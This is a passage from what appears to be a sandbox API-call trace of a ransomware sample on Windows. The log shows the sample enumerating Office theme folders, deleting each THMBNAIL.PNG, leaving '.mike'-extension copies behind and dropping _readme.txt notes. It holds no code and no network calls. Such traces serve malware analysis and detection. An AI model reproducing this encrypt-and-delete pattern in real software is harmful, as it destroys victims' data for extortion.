ftLastAccessTime.dwLowDateTime=0x6d416d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d416d30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SUMIPNTG", cAlternateFileName="")) returned 1 [0053.928] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc24e4f00, ftCreationTime.dwHighDateTime=0x1c06b0e, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc24e4f00, ftLastWriteTime.dwHighDateTime=0x1c06b0e, nFileSizeHigh=0x0, nFileSizeLow=0x1c6c, dwReserved0=0x0, dwReserved1=0x0, cFileName="THEMES.INF", cAlternateFileName="")) returned 1 [0053.928] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ad387f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7084efd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7084efd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WATER", cAlternateFileName="")) returned 1 [0053.928] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7084efd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7084efd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WATERMAR", cAlternateFileName="")) returned 1 [0053.928] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0053.929] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0053.929] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0053.929] CoTaskMemFree (pv=0x4e1c10) [0053.930] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.930] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdad6ec00, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdad6ec00, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xe58e, dwReserved0=0x0, dwReserved1=0x0, cFileName="AFTRNOON.ELM", cAlternateFileName="")) returned 1 [0053.930] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86e63000, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x86e63000, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x22b, dwReserved0=0x0, dwReserved1=0x0, cFileName="AFTRNOON.INF", cAlternateFileName="")) returned 1 [0053.930] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85b50300, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x85b50300, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x621, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0053.930] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86e63000, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x86e63000, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x6292, dwReserved0=0x0, dwReserved1=0x0, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0053.930] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0053.931] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0053.936] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0053.936] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png")) returned 1 [0053.938] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe9714aa0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe9714aa0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.938] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdad6ec00, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdad6ec00, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xe58e, dwReserved0=0x0, dwReserved1=0x0, cFileName="AFTRNOON.ELM", cAlternateFileName="")) returned 1 [0053.939] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86e63000, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x86e63000, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x22b, dwReserved0=0x0, dwReserved1=0x0, cFileName="AFTRNOON.INF", cAlternateFileName="")) returned 1 [0053.939] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85b50300, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x85b50300, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x621, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0053.939] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe96ee940, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe96ee940, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe9714aa0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x64c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="THMBNAIL.PNG.mike", cAlternateFileName="THMBNA~1.MIK")) returned 1 [0053.939] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9714aa0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe9714aa0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe9714aa0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0053.939] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9714aa0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe9714aa0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe9714aa0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0053.939] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0053.939] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0053.939] CoTaskMemFree (pv=0x4e1c10) [0053.940] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.940] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc081900, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x5146e3d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdc081900, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x10fc7, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARCTIC.ELM", cAlternateFileName="")) returned 1 [0053.940] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a79b700, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x5146e3d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8a79b700, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x201, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARCTIC.INF", cAlternateFileName="")) returned 1 [0053.940] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a79b700, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8a79b700, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0xba9, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0053.940] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a79b700, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8a79b700, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x4d44, dwReserved0=0x0, dwReserved1=0x0, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0053.940] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0053.941] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0053.946] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0053.946] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png")) returned 1 [0053.949] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe973ac00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe973ac00, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.949] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc081900, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x5146e3d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdc081900, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x10fc7, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARCTIC.ELM", cAlternateFileName="")) returned 1 [0053.949] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a79b700, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x5146e3d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8a79b700, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x201, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARCTIC.INF", cAlternateFileName="")) returned 1 [0053.949] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a79b700, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8a79b700, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0xba9, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0053.949] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9714aa0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe9714aa0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe9714aa0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x4f70, dwReserved0=0x0, dwReserved1=0x0, cFileName="THMBNAIL.PNG.mike", cAlternateFileName="THMBNA~1.MIK")) returned 1 [0053.949] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe973ac00, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe973ac00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe973ac00, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0053.949] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe973ac00, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe973ac00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe973ac00, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0053.949] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0053.949] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0053.949] CoTaskMemFree (pv=0x4e1c10) [0053.950] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.950] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd394600, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51767f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd394600, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x189be, dwReserved0=0x0, dwReserved1=0x0, cFileName="AXIS.ELM", cAlternateFileName="")) returned 1 [0053.950] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8baae400, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x5f409670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8baae400, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x211, dwReserved0=0x0, dwReserved1=0x0, cFileName="AXIS.INF", cAlternateFileName="")) returned 1 [0053.950] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8baae400, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8baae400, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0xb20, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0053.950] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8baae400, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8baae400, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x8864, dwReserved0=0x0, dwReserved1=0x0, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0053.950] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0053.951] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0053.956] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0053.957] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png")) returned 1 [0053.959] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe973ac00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe973ac00, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.959] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd394600, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51767f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd394600, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x189be, dwReserved0=0x0, dwReserved1=0x0, cFileName="AXIS.ELM", cAlternateFileName="")) returned 1 [0053.959] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8baae400, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x5f409670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8baae400, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x211, dwReserved0=0x0, dwReserved1=0x0, cFileName="AXIS.INF", cAlternateFileName="")) returned 1 [0053.959] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8baae400, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8baae400, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0xb20, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0053.959] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe973ac00, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe973ac00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe973ac00, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x8a90, dwReserved0=0x0, dwReserved1=0x0, cFileName="THMBNAIL.PNG.mike", cAlternateFileName="THMBNA~1.MIK")) returned 1 [0053.959] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe973ac00, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe973ac00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe973ac00, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0053.959] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe973ac00, 